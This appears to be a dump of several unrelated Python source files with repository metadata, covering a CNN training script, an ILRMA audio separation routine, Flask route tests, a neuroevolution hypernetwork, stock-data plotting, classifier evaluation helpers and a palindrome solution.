rawdata = np.reshape(rawdata, [rawdata.shape[0], data_shape[0] * data_shape[1]])
########################################################################################################
#
img_width = data_shape[0]
img_height = data_shape[1]
if flag is FLAG_FINGER:
    train_count = 5000 # Modify this part if you want to test finger recognition. (tested with 2000 or 5000)
test_count = 490
elif flag is FLAG_FACE:
    train_count = 2000 # NaN problems occur because there are fewer than 5000 training samples, or due to overfitting. Do not change this value!
test_count = 490
elif flag is FLAG_ANGLE:
    train_count = 6000 # NaN problems occur because there are fewer than 5000 training samples, or due to overfitting. Do not change this value!
test_count = 1000
else:
raise Exception("unknown flag %d" %flag)
#
train_epoch = train_count
#
TrainX = rawdata[:train_count] # mnist.train.images
TrainY = raw_label[:train_count] # mnist.train.labels
testX = rawdata[train_count:train_count+test_count] # mnist.test.images
testY = raw_label[train_count:train_count+test_count] # mnist.test.labels
# If you change the number of layers to test finger classification, modify the else branch.
if flag is FLAG_FINGER: # For finger classification, modify this part to test different layer configurations.
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[3, 2, 32, True],
[3, 2, 64, True],
[3, 2, 128, True],
[3, 2, 64, True],
[3, 2, 128, True],
# [3, 2, 128, True],
])
elif flag is FLAG_FACE: # For face recognition, only 2 layers already give perfect classification. Do not modify the number of layers.
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[3, 2, 32, True],
[3, 2, 64, True],
# [3, 2, 128, True],
# [3, 2, 64, True],
# [3, 2, 128, True],
# [3, 2, 128, True],
])
elif flag is FLAG_ANGLE: #
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[1, 1, 32, True],
# [1, 1, 64, True],
# [1, 1, 128, True],
# [1, 1, 64, True],
# [1, 1, 128, True],
# [3, 2, 128, True],
])
else:
raise Exception("Unknown flag %d" %flag)
FlatModel = ut._FlatModel(CNNModel, fc_outlayer_count=128)
DropOut, keep_prob = ut._DropOut(FlatModel)
SoftMaxModel = ut._SoftMax(DropOut, label_count=class_num, fc_outlayer_count=128)
TrainStep, Accuracy, y_, correct_prediction = ut._SetAccuracy(SoftMaxModel, label_count=class_num)
sess.run(tf.global_variables_initializer())
for i in range(train_epoch):
tmp_trainX, tmp_trainY = ut.Nextbatch(TrainX, TrainY, 50)
if i%100 == 0:
train_accuracy = Accuracy.eval(feed_dict={x: tmp_trainX, y_: tmp_trainY, keep_prob: 1.0})
print("step %d, training accuracy %g"%(i, train_accuracy))
TrainStep.run(feed_dict={x: tmp_trainX, y_: tmp_trainY, keep_prob: 0.7})
print("test accuracy %g" %Accuracy.eval(feed_dict={x: testX[1:1000, :], y_: testY[1:1000], keep_prob: 1.0}))
| 36.303797
| 116
| 0.566597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,506
| 0.244163
|
b81de3e83d88be8e9727e5be630e392a0dd09037
| 3,176
|
py
|
Python
|
ilrma.py
|
annie-gu/MVAE
|
252b052d69eae9a0b47f4058baf0fe565992f12f
|
[
"MIT"
] | 1
|
2022-01-08T03:31:31.000Z
|
2022-01-08T03:31:31.000Z
|
ilrma.py
|
annie-gu/MVAE
|
252b052d69eae9a0b47f4058baf0fe565992f12f
|
[
"MIT"
] | null | null | null |
ilrma.py
|
annie-gu/MVAE
|
252b052d69eae9a0b47f4058baf0fe565992f12f
|
[
"MIT"
] | 2
|
2020-06-21T12:55:53.000Z
|
2020-11-16T00:56:36.000Z
|
import numpy as np
from common import projection_back
EPS = 1e-9
def ilrma(mix, n_iter, n_basis=2, proj_back=True):
"""Implementation of ILRMA (Independent Low-Rank Matrix Analysis).
This algorithm is called ILRMA1 in http://d-kitamura.net/pdf/misc/AlgorithmsForIndependentLowRankMatrixAnalysis.pdf
    It only works in the determined case (n_sources == n_channels).
Args:
mix (numpy.ndarray): (n_frequencies, n_channels, n_frames)
STFT representation of the observed signal.
n_iter (int): Number of iterations.
n_basis (int): Number of basis in the NMF model.
proj_back (bool): If use back-projection technique.
Returns:
tuple[numpy.ndarray, numpy.ndarray]: Tuple of separated signal and
separation matrix. The shapes of separated signal and separation
matrix are (n_frequencies, n_sources, n_frames) and
(n_sources, n_channels), respectively.
"""
n_freq, n_src, n_frame = mix.shape
sep_mat = np.stack([np.eye(n_src, dtype=mix.dtype) for _ in range(n_freq)])
basis = np.abs(np.random.randn(n_src, n_freq, n_basis))
act = np.abs(np.random.randn(n_src, n_basis, n_frame))
sep = sep_mat @ mix
sep_pow = np.power(np.abs(sep), 2) # (n_freq, n_src, n_frame)
model = basis @ act # (n_src, n_freq, n_frame)
m_reci = 1 / model
eye = np.tile(np.eye(n_src), (n_freq, 1, 1))
for _ in range(n_iter):
for src in range(n_src):
h = (sep_pow[:, src, :] * m_reci[src]**2) @ act[src].T
h /= m_reci[src] @ act[src].T
h = np.sqrt(h, out=h)
basis[src] *= h
np.clip(basis[src], a_min=EPS, a_max=None, out=basis[src])
model[src] = basis[src] @ act[src]
m_reci[src] = 1 / model[src]
h = basis[src].T @ (sep_pow[:, src, :] * m_reci[src]**2)
h /= basis[src].T @ m_reci[src]
h = np.sqrt(h, out=h)
act[src] *= h
np.clip(act[src], a_min=EPS, a_max=None, out=act[src])
model[src] = basis[src] @ act[src]
m_reci[src] = 1 / model[src]
h = m_reci[src, :, :, None] @ np.ones((1, n_src))
h = mix.conj() @ (mix.swapaxes(1, 2) * h)
u_mat = h.swapaxes(1, 2) / n_frame
h = sep_mat @ u_mat + EPS * eye
sep_mat[:, src, :] = np.linalg.solve(h, eye[:, :, src]).conj()
h = sep_mat[:, src, None, :] @ u_mat
h = (h @ sep_mat[:, src, :, None].conj()).squeeze(2)
sep_mat[:, src, :] = (sep_mat[:, src, :] / np.sqrt(h).conj())
np.matmul(sep_mat, mix, out=sep)
np.power(np.abs(sep), 2, out=sep_pow)
np.clip(sep_pow, a_min=EPS, a_max=None, out=sep_pow)
for src in range(n_src):
lbd = np.sqrt(np.sum(sep_pow[:, src, :]) / n_freq / n_frame)
sep_mat[:, src, :] /= lbd
sep_pow[:, src, :] /= lbd ** 2
model[src] /= lbd ** 2
basis[src] /= lbd ** 2
# Back-projection technique
if proj_back:
z = projection_back(sep, mix[:, 0, :])
sep *= np.conj(z[:, :, None])
return sep, sep_mat
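# --- Illustrative usage sketch (editor addition). A random complex tensor stands in
# for a real STFT mixture; shapes follow the docstring, with n_channels == n_sources.
if __name__ == "__main__":
    n_freq, n_ch, n_frame = 257, 2, 100
    mix = (np.random.randn(n_freq, n_ch, n_frame)
           + 1j * np.random.randn(n_freq, n_ch, n_frame))
    sep, sep_mat = ilrma(mix, n_iter=10, n_basis=2, proj_back=True)
    print(sep.shape)      # (257, 2, 100): separated source spectrograms
    print(sep_mat.shape)  # (257, 2, 2): per-frequency demixing matrices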
| 37.809524
| 119
| 0.55699
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 913
| 0.287469
|
b81ecc580a437a3d551ab5dfa4a59c26d6b5e052
| 367
|
py
|
Python
|
tests/routes/test_pages.py
|
Biosystems-Analytics-Lab/shellcast
|
8d578bfa3d66d75502f1a133fe6263d376694247
|
[
"CC-BY-4.0"
] | 5
|
2021-03-24T19:19:48.000Z
|
2022-01-11T09:27:13.000Z
|
tests/routes/test_pages.py
|
Biosystems-Analytics-Lab/shellcast
|
8d578bfa3d66d75502f1a133fe6263d376694247
|
[
"CC-BY-4.0"
] | 1
|
2022-01-13T15:11:09.000Z
|
2022-01-13T21:16:10.000Z
|
tests/routes/test_pages.py
|
Biosystems-Analytics-Lab/shellcast
|
8d578bfa3d66d75502f1a133fe6263d376694247
|
[
"CC-BY-4.0"
] | null | null | null |
import pytest
def test_index(client):
res = client.get('/')
assert res.status_code == 200
def test_about(client):
res = client.get('/about')
assert res.status_code == 200
def test_preferences(client):
res = client.get('/preferences')
assert res.status_code == 200
def test_signin(client):
res = client.get('/signin')
assert res.status_code == 200
| 20.388889
| 34
| 0.700272
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.092643
|
b81fcb30f8bd89568af442548e95ceeba2331cfd
| 412
|
py
|
Python
|
Task -01/loop.py
|
kanzul12/cp19_voice_detector
|
db5478b118bab46897b4230d366e11b9ad65e0ce
|
[
"MIT"
] | 2
|
2019-04-19T08:26:09.000Z
|
2019-04-30T12:52:58.000Z
|
Task -01/loop.py
|
kanzul12/cp19_voice_detector
|
db5478b118bab46897b4230d366e11b9ad65e0ce
|
[
"MIT"
] | 5
|
2019-05-03T07:47:35.000Z
|
2019-05-13T08:37:11.000Z
|
Task -01/loop.py
|
kanzul12/cp19_voice_detector
|
db5478b118bab46897b4230d366e11b9ad65e0ce
|
[
"MIT"
] | null | null | null |
num= int (input("enter number of rows="))
for i in range (1,num+1):
for j in range(1,num-i+1):
print (" ",end="")
for j in range(2 and 9):
print("2","9")
for i in range(1, 6):
for j in range(1, 10):
if i==5 or i+j==5 or j-i==4:
print("*", end="")
else:
print(end=" ")
print()
| 16.48
| 44
| 0.383495
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 42
| 0.101942
|
6293f58cd98657d8f6c935c1d17ddd8632667efa
| 4,819
|
py
|
Python
|
examples/racing/models/HyperNN.py
|
Chris-Carvelli/DeepNeuroevolution
|
72e11fd08273ee1b25c346abd90b76a5975c39db
|
[
"MIT"
] | null | null | null |
examples/racing/models/HyperNN.py
|
Chris-Carvelli/DeepNeuroevolution
|
72e11fd08273ee1b25c346abd90b76a5975c39db
|
[
"MIT"
] | null | null | null |
examples/racing/models/HyperNN.py
|
Chris-Carvelli/DeepNeuroevolution
|
72e11fd08273ee1b25c346abd90b76a5975c39db
|
[
"MIT"
] | 1
|
2021-05-14T15:08:15.000Z
|
2021-05-14T15:08:15.000Z
|
import random
import math
from functools import reduce
import torch
import torch.nn as nn
def random_z_v(z_dim, z_num):
# ret = np.random.normal(0.01, 1.0, z_dim * z_num)
return torch.distributions.normal.Normal(torch.zeros([z_num, z_dim]), 0.1).sample()
class HyperNN(nn.Module):
def __init__(self, obs_space, action_space, pnn, tiling=64, shrink=1):
super().__init__()
self._tiling = tiling
self.z_dim = int(32 * shrink)
self.z_v_evolve_prob = 0.5
self.pnn = pnn(obs_space, action_space)
self.pnn_modules = list(dict(self.pnn.named_children()).keys())
self.out_features = self._get_out_features()
self.z_num, self.z_indexer = self._get_z_num()
in_size = int(128 * shrink)
self.hnn = nn.Sequential(
nn.Linear(self.z_dim, in_size),
nn.ReLU(),
nn.Linear(in_size, in_size),
nn.ReLU(),
nn.Linear(in_size, self.out_features),
)
self.register_buffer('z_v', random_z_v(self.z_dim, self.z_num))
self.add_tensors = {}
self._init_nn()
def forward(self, layer_index=None):
if layer_index is None:
return [self.hnn(x) for x in self.z_v]
else:
if isinstance(layer_index, int):
module_name = self.pnn_modules[layer_index]
else:
module_name = layer_index
z_shard = self.z_indexer[module_name]
return [self.hnn(x) for x in self.z_v[z_shard]]
def evolve(self, sigma):
coin_toss = random.random()
if coin_toss > self.z_v_evolve_prob:
# evolve z vector
module_idx = math.floor(random.random() * len(self.pnn_modules))
module_name = self.pnn_modules[module_idx]
for name in self.z_indexer:
if module_name in name:
z_shard = self.z_indexer[name]
self.z_v[z_shard] += torch.distributions.normal.Normal(
torch.zeros([z_shard.stop - z_shard.start, self.z_dim]),
sigma
).sample()
self._update_pnn()
else:
# evolve weights
params = self.named_parameters()
for name, tensor in sorted(params):
if 'z_v' not in name:
to_add = self.add_tensors[tensor.size()]
to_add.normal_(0.0, sigma)
tensor.data.add_(to_add)
self._update_pnn()
def evaluate(self, env, max_eval, render=False, fps=60):
return self.pnn.evaluate(env, max_eval, render, fps)
def _init_nn(self):
for name, tensor in self.named_parameters():
if tensor.size() not in self.add_tensors:
self.add_tensors[tensor.size()] = torch.Tensor(tensor.size())
if 'weight' in name:
nn.init.kaiming_normal_(tensor)
elif 'z_v' not in name:
tensor.data.zero_()
self._update_pnn()
# tiling not supported (but it should be a bit faster, performance gain unclear)
def _update_pnn(self):
weights = self()
if self._tiling:
for name, param in self.pnn.named_parameters():
z_shard = self.z_indexer[name]
param.data = self._shape_w(weights[z_shard], param.shape).data
else:
i = 0
for name, param in self.pnn.named_parameters():
param.data = self._shape_w(weights[i], param.shape).data
i += 1
def _shape_w(self, w, layer_shape):
if isinstance(w, list):
w = torch.cat(w)
w = torch.Tensor(w)
w = torch.narrow(w, 0, 0, reduce((lambda x, y: x * y), layer_shape))
w = w.view(layer_shape)
return w
def _get_z_num(self):
z_num = 0
z_indexer = {}
# tiling
for name, param in self.pnn.named_parameters():
if self._tiling is not None:
layer_shape = param.shape
layer_size = reduce((lambda x, y: x * y), layer_shape, 1)
z_shard = math.ceil(layer_size / self.out_features)
z_indexer[name] = slice(z_num, z_num + z_shard, 1)
z_num += z_shard
else:
z_num += 1
return z_num, z_indexer
def _get_out_features(self):
if self._tiling is not None:
return self._tiling
ret = 0
for name, param in self.pnn.named_parameters():
if 'weight' in name:
layer_shape = param.shape
layer_size = reduce((lambda x, y: x * y), layer_shape)
if layer_size > ret:
ret = layer_size
return ret
| 32.782313
| 87
| 0.552812
| 4,550
| 0.944179
| 0
| 0
| 0
| 0
| 0
| 0
| 202
| 0.041917
|
62961303726bbf57667dd5ce6020b5b0a4afb7e5
| 8,351
|
py
|
Python
|
O.py
|
duongnguyenkt11/data-realtime
|
9d8f6c8e0f6a766c058d0696669543dbafaff63c
|
[
"MIT"
] | null | null | null |
O.py
|
duongnguyenkt11/data-realtime
|
9d8f6c8e0f6a766c058d0696669543dbafaff63c
|
[
"MIT"
] | null | null | null |
O.py
|
duongnguyenkt11/data-realtime
|
9d8f6c8e0f6a766c058d0696669543dbafaff63c
|
[
"MIT"
] | null | null | null |
from functools import reduce
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_notebook
from CONSTANTS import *
from utilities import *
import pandas as pd, numpy as np
ENVIRON = C.LOCAL
def mmap(*args):
return list(map(*args))
class O:
################################################################################
# Init #
################################################################################
def __init__(self, cleansed, df=None):
self.cleansed = cleansed
self.n = len(cleansed[C.CTIME])
self.hoseData = {cleansed[C.CTIME][i]: cleansed[C.CHOSE][i] for i in range(len(cleansed[C.CTIME]))}
self.hoseArr = cleansed[C.CHOSE]
self.stocks = sorted(list(cleansed[C.CHOSE][0].keys()))
self.times = cleansed[C.CTIME]
self.errorDataPoints = []
self.hours = mmap(numerizeTime, self.times)
self.seconds = mmap(toSeconds, self.times)
self.Xs = mmap(numerizeTime, self.times)
self.p = figure(plot_width=1400, plot_height=400)
self.df = pd.DataFrame.from_dict(self.cleansed)
self.nnBuyVolumes = [-1] * self.n
self.nnSellVolumes = [-1] * self.n
self.nnBuyValues = [-1] * self.n
self.nnSellValues = [-1] * self.n
self.numpied = False
self.allPlots = []
self.intervals = []
self.totalLiquidity = []
def numpyItUp(self):
if self.numpied: return
self.numpied = True
a = [self.nnBuyVolumes, self.nnSellVolumes, self.nnBuyValues, self.nnSellValues,
self.hours, self.seconds, self.Xs, self.times]
for x in a:
x = np.array(x)
################################################################################
# Utilities - Misc #
################################################################################
def timeRange(self, start, end):
resStart, resEnd = -1, -1
for i in range(1, len(self.Xs)):
if self.Xs[i] > start:
resStart = i - 1
break
for i in range(len(self.Xs) - 1, 0, -1):
if self.Xs[i] < end:
resEnd = i + 1
break
return resStart, resEnd
def setInterval(self, STEP=60):
return
###############################################################################
# Computation #
###############################################################################
def _calculateNNVolumes_i(self, i):
time = self.times[i]
print(f"\r{i}: {time}", end="")
hose = self.hoseData[time]
buys, sells = [], []
try:
buys = mmap(lambda stock: hose[stock][C.NN_BUY], self.stocks)
sells = mmap(lambda stock: hose[stock][C.NN_SELL], self.stocks)
except:
self.errorDataPoints.append(time)
finally:
if len(buys) > 0 and len(sells) > 0:
self.nnBuyVolumes[i] = buys
self.nnSellVolumes[i] = sells
def calculateNNVolumes(self):
mmap(self._calculateNNVolumes_i, range(self.n))
def _calculateNNValues_i(self, i):
time = self.times[i]
hose = self.hoseData[time]
print(f"\r{i}: {time}", end="")
self.nnBuyValues[i] = (reduce(lambda a, b: a + b,
map(lambda stock: hose[stock][C.NN_BUY] * hose[stock][C.COL_AVG_PRICE], self.stocks)))
self.nnSellValues[i] = (reduce(lambda a, b: a + b,
map(lambda stock: hose[stock][C.NN_SELL] * hose[stock][C.COL_AVG_PRICE],
self.stocks)))
def calculateNNValues(self):
mmap(self._calculateNNValues_i, range(self.n))
def applyPricingConventions(self):
self.nnBuyValues = [x / 100000 for x in self.nnBuyValues]
self.nnSellValues = [x / 100000 for x in self.nnSellValues]
def calculateTradedValues(self):
def valAtSnapShot(time):
hose = self.hoseData[time]
stockTradedValue = lambda stock: hose[stock][C.COL_TOTAL_VOL]*hose[stock][C.COL_AVG_PRICE]
vals = mmap(stockTradedValue, self.stocks)
return reduce(lambda a, b: a + b, vals)
self.totalLiquidity = mmap(valAtSnapShot, self.times)
################################################################################
# Plotting #
################################################################################
def plot_Liquidity_Bar(self):
return
def initializePlot(self, file,p, ENVIRON=ENVIRON, title="HOSE"):
if ENVIRON == C.LOCAL:
output_file(file)
else:
output_notebook()
if p is None:
p = figure(plot_width=PC.WIDTH, plot_height=PC.HEIGHT, title=title)
self.allPlots.append(p)
return p
return p
def plot_BS_Pressure(self, p=None, file=FN.PLOT_BUY_SELL_PRESSURE_FILE):
p = self.initializePlot(file, p, ENVIRON=ENVIRON, title="Ap luc mua, apluc ban")
p.line(self.Xs, self.cleansed[C.CBUYP], line_width=2, color="green")
p.line(self.Xs, self.cleansed[C.CSELLP], line_width=2, color="red")
show(p)
def plot_NN_Liquidity_Bar(self, file="/home/sotola/foo.html", p=None):
def prep(seconds, vals, STEP=20, REVERSED=False): # Prepare Data
bins2 = []; x = [];bins, xs = intervalize(seconds, vals, STEP=STEP)
for i in range(len(bins)):
bins2.append(bins[i]); bins2.append(bins[i])
for i in range(len(xs)):
x.append(xs[i][0]); x.append(xs[i][1])
if REVERSED: return x, [bin * -1 for bin in bins2]
else: return x, bins2
p = self.initializePlot(file, p, ENVIRON=ENVIRON, title="Thanh khoan khoi nuoc ngoai")
xbuy, topbuy = prep(self.seconds, self.nnBuyValues)
p.vbar(x=xbuy, top=toDelta(topbuy), width=0.01, color="green")
xsell, topsell = prep(self.seconds, self.nnSellValues, REVERSED=True)
p.vbar(x=xsell, top=toDelta(topsell), width=0.01, color="red")
show(p)
def plot__Liquidity_Bar(self, file="/home/sotola/Hose-MarketLiquidity.html", p=None):
def prep(seconds, vals, STEP=20, REVERSED=False): # Prepare Data
bins2 = []; x = [];bins, xs = intervalize(seconds, vals, STEP=STEP)
for i in range(len(bins)):
bins2.append(bins[i]); bins2.append(bins[i])
for i in range(len(xs)):
x.append(xs[i][0]); x.append(xs[i][1])
if REVERSED: return x, [bin * -1 for bin in bins2]
else: return x, bins2
p = self.initializePlot(file, p, ENVIRON=ENVIRON, title="Thanh Khoan Thi Truong")
xbuy, topbuy = prep(self.seconds, self.totalLiquidity)
p.vbar(x=xbuy, top=toDelta(topbuy), width=0.01, color="green")
show(p)
def plot_NN_Accumulated_Values(self, p=None, file=FN.PLOT_NN_VALUES_FILE):
p = self.initializePlot(file, p, ENVIRON=ENVIRON, title="Tong Thanh Khoan (NN)")
p.line(self.Xs, np.array(self.nnBuyValues ) / 100000, line_width=2, color="green")
p.line(self.Xs, np.array(self.nnSellValues) / 100000, line_width=2, color="red")
show(p)
def plot_NN_Velocity_Values(self, p=None, start=None, end=None, file=FN.PLOT_NN_VELOCITY_FILE):
p = self.initializePlot(file, p, ENVIRON=ENVIRON)
if not(start is None):
start_i, end_i = self.timeRange(start, end)
else:
start_i = 0; end_i = -1
buys = [x / 100000 for x in toDelta(self.nnBuyValues)[start_i:end_i]]
sells = [x / 100000 for x in toDelta(self.nnSellValues)[start_i:end_i]]
diffs = [buys[i] - sells[i] for i in range(len(sells))][start_i:end_i]
p.line(self.Xs[start_i:end_i], buys, line_width=2, color="green")
p.line(self.Xs[start_i:end_i], sells, line_width=2, color="red")
show(p)
| 41.137931
| 124
| 0.524009
| 8,027
| 0.961202
| 0
| 0
| 0
| 0
| 0
| 0
| 1,244
| 0.148964
|
6296eebeb1e65d269ec9089013edb6a402685434
| 6,790
|
py
|
Python
|
project1/evaluation.py
|
DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch
|
bcb24a9258ea004a3694e6eaa524b499c2584f96
|
[
"MIT"
] | null | null | null |
project1/evaluation.py
|
DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch
|
bcb24a9258ea004a3694e6eaa524b499c2584f96
|
[
"MIT"
] | null | null | null |
project1/evaluation.py
|
DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch
|
bcb24a9258ea004a3694e6eaa524b499c2584f96
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# [0,0] = TN
# [1,1] = TP
# [0,1] = FP
# [1,0] = FN
# cm is a confusion matrix
# Accuracy: (TP + TN) / Total
def accuracy(cm: pd.DataFrame) -> float:
return (cm[0,0] + cm[1,1]) / cm.sum()
# Precision: TP / (TP + FP)
def precision(cm: pd.DataFrame) -> float:
return cm[1,1] / (cm[1,1] + cm[0,1])
# False positive rate: FP / N = FP / (FP + TN)
def false_positive(cm: pd.DataFrame) -> float:
return cm[0,1] / (cm[0,0] + cm[0,1])
# True positive rate: TP / P = TP / (TP + FN)
# Equivalent to sensitivity/recall
def true_positive(cm: pd.DataFrame) -> float:
return cm[1,1] / (cm[1,0] + cm[1,1])
# F1 score: 2 * precision * recall / (precision + recall)
def f_score(cm: pd.DataFrame) -> float:
return 2 * precision(cm) * true_positive(cm) / (precision(cm) + true_positive(cm))
# Returns a confusion matrix for labels and predictions
# [[TN, FP],
# [FN, TP]]
def confusion_matrix(y, y_hat):
cm = np.zeros((2, 2))
np.add.at(cm, [y.astype(int), y_hat.astype(int)], 1)
return cm
def visualize_cm(cm):
df_cm = pd.DataFrame(cm, columns=['0', '1'], index=['0', '1'])
df_cm.index.name = 'Actual'
df_cm.columns.name = 'Predicted'
plt.figure(figsize=(5, 3))
sns.heatmap(df_cm, cmap='Blues', annot=True, annot_kws={'size': 16}, fmt='g')
# Function to return two shuffled arrays, is a deep copy
def shuffle(x, y):
x_copy = x.copy()
y_copy = y.copy()
rand = np.random.randint(0, 10000)
np.random.seed(rand)
np.random.shuffle(x_copy)
np.random.seed(rand)
np.random.shuffle(y_copy)
return x_copy, y_copy
# Shuffles and splits data into two sets
# test split will be 1/size of the data
def split(x, y, size):
x1, y1, = shuffle(x, y)
x1_test = x1[0:int(x1.shape[0] / size)]
x1_train = x1[int(x1.shape[0] / size):]
y1_test = y1[0:int(y1.shape[0] / size)]
y1_train = y1[int(y1.shape[0] / size):]
return x1_train, x1_test, y1_train, y1_test
def cross_validation(k, X, Y, model, lr=0.5, regularization=0, eps=1e-2, verbose=True):
# randomize X and Y by shuffling
x, y = shuffle(X, Y)
# split into k folds
x_folds = np.array_split(x, k)
y_folds = np.array_split(y, k)
acc = 0
f1 = 0
prec = 0
rec = 0
cms = []
for i in range(k):
validation_features = x_folds[i]
validation_labels = np.squeeze(y_folds[i])
train_features = np.delete(x_folds, i, axis=0)
train_features = np.concatenate(train_features)
train_labels = np.delete(y_folds, i, axis=0)
train_labels = np.concatenate(train_labels)
m = model(train_features, train_labels)
m.fit(lr, verbose=False, regularization=regularization, eps=eps)
predicted_labels = m.predict(validation_features)
cm = confusion_matrix(validation_labels, predicted_labels)
acc += accuracy(cm)
f1 += f_score(cm)
prec += precision(cm)
rec += true_positive(cm)
cms.append(cm)
if verbose:
print("Accuracy:", acc/k, "Precision:", prec/k, "Recall:", rec/k, "F1:", f1/k)
# Return the accuracy and array of confusion matrices
return acc/k, np.array(cms)
# assume 5 fold for now
def cross_validation_naive(k, df, model, label, cont=[], cat=[], bin=[]):
df = df.copy(deep=True)
np.random.shuffle(df.values)
df = df.reset_index(drop=True)
indices = np.arange(df.shape[0])
indices = np.array_split(indices, k)
acc = 0
f1 = 0
prec = 0
rec = 0
cms = []
for i in range(k):
val = df.loc[indices[i]]
train = df.loc[np.concatenate(np.delete(indices, i, axis=0))]
m = model(train, label, cont, cat, bin)
pred = val.apply(m.predict, axis=1)
cm = confusion_matrix(val[label], pred)
acc += accuracy(cm)
f1 += f_score(cm)
prec += precision(cm)
rec += true_positive(cm)
cms.append(cm)
print("Accuracy:", acc / k, "Precision:", prec / k, "Recall:", rec / k, "F1:", f1 / k)
# Return the accuracy and array of confusion matrices
return acc / k, np.array(cms)
def cv_task_2(k, X, Y, model, lr = 0.5, regularization=0, eps = 1e-2, iterations=200):
# randomize X and Y by shuffling
x, y = shuffle(X, Y)
# split into k folds
x_folds = np.array_split(x, k)
y_folds = np.array_split(y, k)
train_acc_history = np.empty([k, iterations])
val_acc_history = np.empty([k, iterations])
for i in range(k):
val_features = x_folds[i]
val_labels = np.squeeze(y_folds[i])
        train_features = np.delete(x_folds, i, axis=0)  # axis=0 keeps the fold structure, mirroring cross_validation above
train_features = np.concatenate(train_features)
train_labels = np.delete(y_folds, i, axis=0)
train_labels = np.concatenate(train_labels)
m = model(train_features, train_labels)
costs = []
train_accuracies = []
val_accuracies = []
# Keep on training until difference reached threshold
for j in range(iterations):
# fit model for 1 iteration
cost = m.fit(lr=lr, verbose=False, regularization=regularization, eps=None, epochs=1)
costs.append(cost)
# predict the labels and eval accuracy for train and val split
val_pred_labels = m.predict(val_features)
train_pred_labels = m.predict(train_features)
cm_val = confusion_matrix(val_labels, val_pred_labels)
cm_train = confusion_matrix(train_labels, train_pred_labels)
val_accuracies.append(accuracy(cm_val))
train_accuracies.append(accuracy(cm_train))
# store the costs and accuracies
train_acc_history[i] = np.array(train_accuracies)
val_acc_history[i] = np.array(val_accuracies)
return train_acc_history, val_acc_history
def grid_search(learning_rates, epsilons, lambdas, x, y, model):
max_acc = 0
arg_max = [0,0,0]
for lr in learning_rates:
for eps in epsilons:
for regularization in lambdas:
#print(lr, eps, regularization)
acc, cm = cross_validation(5, x, y, lr=lr, eps=eps, regularization=regularization, model=model, verbose=False)
if acc > max_acc:
max_acc = acc
arg_max = [lr, eps, regularization]
max_cm = cm
f1 = []
prec = []
rec = []
for cm in max_cm:
f1.append(f_score(cm))
prec.append(precision(cm))
rec.append(true_positive(cm))
f1 = np.mean(f1)
prec = np.mean(prec)
rec = np.mean(rec)
print(arg_max)
print("Accuracy:", max_acc, "Precision:", prec, "Recall:", rec, "F1:", f1)
return max_acc, arg_max
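# Illustrative usage of the metric helpers above (not part of the original module);
# the toy labels below are made up purely to show the expected call pattern.
if __name__ == '__main__':
    y_true = np.array([0, 1, 1, 0, 1])
    y_pred = np.array([0, 1, 0, 0, 1])
    cm = confusion_matrix(y_true, y_pred)
    print("Accuracy:", accuracy(cm), "Precision:", precision(cm),
          "Recall:", true_positive(cm), "F1:", f_score(cm))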
| 29.267241
| 126
| 0.610162
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,123
| 0.16539
|
62982d88e6406e32cdc302d54bc0206efda33025
| 957
|
py
|
Python
|
LeetCode/0005_Longest_Palindromic_Substring.py
|
Achyut-sudo/PythonAlgorithms
|
21fb6522510fde7a0877b19a8cedd4665938a4df
|
[
"MIT"
] | 144
|
2020-09-13T22:54:57.000Z
|
2022-02-24T21:54:25.000Z
|
LeetCode/0005_Longest_Palindromic_Substring.py
|
Achyut-sudo/PythonAlgorithms
|
21fb6522510fde7a0877b19a8cedd4665938a4df
|
[
"MIT"
] | 587
|
2020-05-06T18:55:07.000Z
|
2021-09-20T13:14:53.000Z
|
LeetCode/0005_Longest_Palindromic_Substring.py
|
Achyut-sudo/PythonAlgorithms
|
21fb6522510fde7a0877b19a8cedd4665938a4df
|
[
"MIT"
] | 523
|
2020-09-09T12:07:13.000Z
|
2022-02-24T21:54:31.000Z
|
'''
Problem:-
Given a string s, find the longest palindromic substring in s.
You may assume that the maximum length of s is 1000.
Example 1:
Input: "babad"
Output: "bab"
Note: "aba" is also a valid answer.
'''
class Solution:
def longestPalindrome(self, s: str) -> str:
res = ""
resLen = 0
for i in range(len(s)):
# odd length
l, r = i, i
while l >= 0 and r < len(s) and s[l] == s[r]:
if (r - l + 1) > resLen:
res = s[l:r + 1]
resLen = r - l + 1
l -= 1
r += 1
# even length
l, r = i, i + 1
while l >= 0 and r < len(s) and s[l] == s[r]:
if (r - l + 1) > resLen:
res = s[l:r + 1]
resLen = r - l + 1
l -= 1
r += 1
return res
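# Quick illustrative check (not part of the original solution file): the expand-
# around-center approach returns "bab" (or "aba") for "babad" and "bb" for "cbbd".
if __name__ == "__main__":
    assert Solution().longestPalindrome("babad") in ("bab", "aba")
    assert Solution().longestPalindrome("cbbd") == "bb"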
| 25.184211
| 63
| 0.378265
| 730
| 0.7628
| 0
| 0
| 0
| 0
| 0
| 0
| 252
| 0.263323
|
6299c0fed43754304eadd3c72255fa97d06e27b5
| 119
|
py
|
Python
|
pyimagesearch/utils/__init__.py
|
agoila/lisa-faster-R-CNN
|
3b88c9b7da2106a805089f9619ea62cdc1f21d99
|
[
"MIT"
] | 17
|
2018-09-09T10:56:58.000Z
|
2022-02-22T07:18:50.000Z
|
pyimagesearch/utils/__init__.py
|
agoila/lisa-faster-R-CNN
|
3b88c9b7da2106a805089f9619ea62cdc1f21d99
|
[
"MIT"
] | null | null | null |
pyimagesearch/utils/__init__.py
|
agoila/lisa-faster-R-CNN
|
3b88c9b7da2106a805089f9619ea62cdc1f21d99
|
[
"MIT"
] | 21
|
2018-09-19T11:07:10.000Z
|
2022-02-22T07:18:45.000Z
|
# import the necessary packages
from .agegenderhelper import AgeGenderHelper
from .imagenethelper import ImageNetHelper
| 39.666667
